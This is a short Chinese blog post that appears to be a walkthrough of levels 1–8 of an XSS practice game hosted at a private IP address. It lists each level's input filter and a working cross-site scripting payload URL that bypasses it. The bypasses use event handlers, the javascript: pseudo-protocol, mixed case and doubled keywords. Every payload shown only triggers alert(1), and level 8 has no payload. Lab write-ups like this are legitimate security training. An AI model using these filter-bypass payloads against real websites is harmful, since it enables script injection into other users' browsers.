XSS-Game

  1. 很简单的弹窗

    http://192.168.31.177/xssgame/level1.php?name=<script>alert(1)</script>

  2. 过滤了><

    http://192.168.31.177/xssgame/level2.php?keyword=" oninput='alert(1)'//&submit=‘搜索’

  3. 过滤了><'

    用单引号替换了双引号

    http://192.168.31.177/xssgame/level3.php?keyword=' oninput=alert(1) //&submit=搜索

  4. 过滤了><"

    http://192.168.31.177/xssgame/level4.php?keyword=" onmouseover=alert(1)//&submit=搜索

  5. script替换成scr_ipton事件替换成了on_事件

    利用伪协议 <a href='javascript:alert(1)'>来执行弹框

    http://192.168.31.177/xssgame/level5.php?keyword="><a href='javascript:alert(1)'> //&submit=搜索

  6. script替换成scr_ipton事件替换成了on_事件href替换成了hr_ef

    大小写绕过

    http://192.168.31.177/xssgame/level6.php?keyword="<sCRipt>alert(1)</script>//&submit=搜索

  7. scriptonhref直接替换为空

    双写绕过

    http://192.168.31.177/xssgame/level7.php?keyword=1" oonnmouseover=alert(1)>//&submit=搜索

  8. script替换成了scr_ipton事件替换成了on_事件href替换成了hr_ef

posted @ 2022-07-16 15:21  余星酒  阅读(56)  评论(0)    收藏  举报